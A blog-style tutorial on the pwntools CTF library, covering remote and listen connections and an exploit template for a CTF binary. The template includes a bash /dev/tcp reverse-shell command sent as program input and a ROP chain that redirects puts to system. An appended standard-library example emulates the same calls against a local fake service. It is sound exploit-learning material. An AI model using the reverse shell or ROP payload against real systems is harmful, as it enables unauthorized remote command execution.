
Fwnable

Using pwntools

signalsunnyA 2018. 4. 2. 21:55

pwntools


what?

CTF framework and exploit development library.

Written in Python.

pwn : toolbox optimized for CTFs

pwnlib : general-purpose Python library


Getting Started

1. Making connections

(1) remote

Creates a TCP or UDP connection to a remote host (supports both IPv4 and IPv6).

class : remote(host, port, fam='any', typ='tcp', ssl=False (bool), sock=None, *args, **kwargs)



>>> r = remote('google.com', 443, ssl=True)
>>> r.send('GET /\r\n\r\n')
>>> r.recvn(4)
'HTTP'



(2) listen

Creates a TCP or UDP socket that can receive data.

-------------------------------------------------------python code---------------------------------------------------------

#!/usr/bin/env python
# encoding: utf-8

import sys
import time

from pwn import *


# getting started ------------- local or remote or ssh / ELF info -------------------

LOCAL = "remote" not in sys.argv  # True unless the word "remote" is given on the command line

elf = ELF("./rop01")  # target program's ELF
context.update(binary=elf)  # set arch/bits/endianness from the target binary

if LOCAL:
    libc = elf.libc
    r = process(elf.path)
else:
    libc = ELF("libc.so")  # remote / ssh setting: the libc shipped with the challenge
    r = remote("localhost", 1337)

l = listen(1337)  # listener for the callback connection


# debugging --------------------------------------------------------------------------

def debug(cmd=''):  # def function_name(parameter):
    if "gdb" in sys.argv:  # attach gdb, run the given gdb commands, then continue
        pie_base, glibc_base = r.libs()[elf.path], r.libs()[libc.path]
        gdb.attach(r.proc.pid, cmd + """\nc""")
    elif "strace" in sys.argv:  # trace syscalls instead of attaching gdb
        run_in_new_terminal("strace -ff -p %d" % r.proc.pid)
    time.sleep(0.5)

# ----------------------------------------------------------------------------------

debug('b *0x8048701')

r.sendlineafter("What is your name?\n> ", "bash -c 'bash -i >& /dev/tcp/127.0.0.1/1337 0>&1'\x00")
r.sendlineafter("What is your quest?\n> ", "B" * 100)

payload = flat(
    "C" * 112,

    # NEED CONTROL OF EBP
    0x0804871a,  # popad ; cld ; ret

    0,  # EDI
    0,  # ESI
    elf.got['puts'] - 0xc,  # EBP
    "TEST",
    0,  # EBX
    libc.symbols['system'] - libc.symbols['puts'],  # EDX
    0,  # ECX
    0,  # EAX

    0x0804858c,  # mov eax, dword [ebp+0x0C] ; add eax, edx ; pop ebp ; ret  (1 found)
    "JUNK",  # pop ebp

    0x080484f1,  # call eax
    elf.symbols['answer1']
)

r.sendlineafter("What is the air-speed velocity of an unladen swallow?\n> ", payload)

log.info('Waiting for a shell...')
l.wait_for_connection()
l.interactive()
r.close()

---------------------------------------------------------------------------------------------------------------------------
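The remote/listen pair described in Getting Started and the sendlineafter / wait_for_connection calls in the template above are all pwntools "tube" operations. The following is an added example, not code from this post or from pwntools itself: it re-implements, with only the Python standard library, the handful of tube methods the page uses (send, sendline, recvn, recvuntil, recvline, sendlineafter, plus a listen-style listener) and runs both sides over a loopback socket against a constructed fake service that prints the same two prompts the template answers. The Tube, Listener, fake_service and run_exchange names and the PROMPTS dialogue are this example's own assumptions.

```python
import socket
import threading

# Constructed prompts mimicking the dialogue the template above talks to;
# this is a fake local service, not a real target binary.
PROMPTS = [b"What is your name?\n> ", b"What is your quest?\n> "]


class Tube:
    """Minimal stand-in for the pwntools tube methods used on this page."""

    def __init__(self, sock):
        self.sock = sock
        self.buf = b""  # bytes received but not yet consumed

    def _fill(self):
        chunk = self.sock.recv(4096)
        if not chunk:
            raise EOFError("connection closed")
        self.buf += chunk

    def send(self, data):
        self.sock.sendall(data)

    def sendline(self, data):
        # sendline == send plus a trailing newline
        self.send(data + b"\n")

    def recvn(self, n):
        # Blocks until exactly n bytes are available, like pwntools recvn.
        while len(self.buf) < n:
            self._fill()
        out, self.buf = self.buf[:n], self.buf[n:]
        return out

    def recvuntil(self, delim):
        # Consumes through the delimiter (inclusive) and returns all of it.
        while delim not in self.buf:
            self._fill()
        idx = self.buf.index(delim) + len(delim)
        out, self.buf = self.buf[:idx], self.buf[idx:]
        return out

    def recvline(self):
        return self.recvuntil(b"\n")

    def sendlineafter(self, delim, data):
        # Wait for the prompt, then answer it; returns the consumed prompt.
        got = self.recvuntil(delim)
        self.sendline(data)
        return got

    def close(self):
        self.sock.close()


class Listener:
    """Stand-in for pwntools listen(): bind now, accept in wait_for_connection()."""

    def __init__(self, port=0, bindaddr="127.0.0.1"):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((bindaddr, port))  # port 0: let the kernel pick a free port
        self.sock.listen(1)
        self.lport = self.sock.getsockname()[1]

    def wait_for_connection(self):
        conn, _ = self.sock.accept()
        self.sock.close()
        return Tube(conn)


def remote(host, port):
    """Stand-in for pwntools remote(): TCP connect, wrapped in a Tube."""
    return Tube(socket.create_connection((host, port)))


def fake_service(listener, answers):
    """Server side: send each prompt and record the line the client answers with."""
    t = listener.wait_for_connection()
    for prompt in PROMPTS:
        t.send(prompt)
        answers.append(t.recvline().rstrip(b"\n"))
    t.send(b"goodbye\n")
    t.close()


def run_exchange():
    """Drive both sides locally; returns (prompts_seen, answers_received, trailer)."""
    l = Listener(0)
    answers = []
    srv = threading.Thread(target=fake_service, args=(l, answers))
    srv.start()

    r = remote("127.0.0.1", l.lport)
    seen = [
        r.sendlineafter(b"What is your name?\n> ", b"Arthur"),
        r.sendlineafter(b"What is your quest?\n> ", b"B" * 100),
    ]
    trailer = r.recvn(7)  # exactly 7 bytes: b"goodbye"
    rest = r.recvline()   # the remaining b"\n"
    r.close()
    srv.join()
    return seen, answers, trailer + rest


if __name__ == "__main__":
    print(run_exchange())
```

Running it makes the semantics explicit that matter when scripting against a real service: recvn(n) blocks until exactly n bytes have arrived, recvuntil consumes the delimiter itself, sendlineafter returns the prompt it consumed, and a listener binds at construction time while wait_for_connection() only blocks until a client has actually connected, which is why the template can create its listener before sending anything and wait on it afterwards.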


